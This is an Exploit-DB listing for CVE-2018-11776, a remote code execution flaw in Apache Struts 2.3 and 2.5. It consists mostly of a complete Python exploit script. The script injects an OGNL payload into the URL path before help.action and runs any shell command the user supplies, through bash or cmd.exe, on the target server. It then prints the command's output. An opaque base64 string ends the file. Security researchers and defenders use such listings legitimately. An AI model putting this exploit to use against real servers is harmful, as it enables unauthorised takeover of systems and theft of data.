Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)

2018-08-25T00:00:00
ID EDB-ID:45262
Type exploitdb
Reporter Exploit-DB
Modified 2018-08-25T00:00:00

Description

Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2). CVE-2018-11776. Remote exploit for Multiple platform

                                        
                                            #!/usr/bin/python
# -*- coding: utf-8 -*-

# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

import sys
import urllib
import urllib2
import httplib


def exploit(host,cmd):
    print "[Execute]: {}".format(cmd)

    ognl_payload = "${"
    ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
    ognl_payload += "(#cmd='{}').".format(cmd)
    ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
    ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    ognl_payload += "(#p.redirectErrorStream(true))."
    ognl_payload += "(#process=#p.start())."
    ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    ognl_payload += "(#ros.flush())"
    ognl_payload += "}"

    if not ":" in host:
        host = "{}:8080".format(host)

    # encode the payload
    ognl_payload_encoded = urllib.quote_plus(ognl_payload)

    # further encoding
    url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))

    print "[Url]: {}\n\n\n".format(url)

    try:
        request = urllib2.Request(url)
        response = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        response = e.partial
    print response


if len(sys.argv) &lt; 3:
    sys.exit('Usage: %s &lt;host:port&gt; &lt;cmd&gt;' % sys.argv[0])
else:
    exploit(sys.argv[1],sys.argv[2])

#cE0vOWpxNWoveVBRaHBiQnJ2dnlzdDJHNXhZbjE4ekdBL1RLWnpXWDl2cFliZmxxcnFBMVRHL2oyTEZvV0JhRmJQWjFUS1ZZMXRtY3NFbG9UZDRlTExwd29sVDJtTEtpSnZKQjJEeElqR3FwOHdpK2hmbERmb2dUQjRmdjUwaisvckxGOCtSZFZ3SWNkbGRoK0xNUGZBclpjZ25TK0hCVEpscjAxdm0wb2RzZG5QK3UwSzE1aUgrMmN5TTNwYjNzaWg2MDRLSlpLZnVybXhXZFZPOXJ4ZHZ4YjhJRzhMYjdiTW8zNGN3UDJJYVEyWHllTzFwTlVGVG5mL1VHRUlTbS82VTgrajc0UmZ2VjVnNGVodTdwcEE9PQ==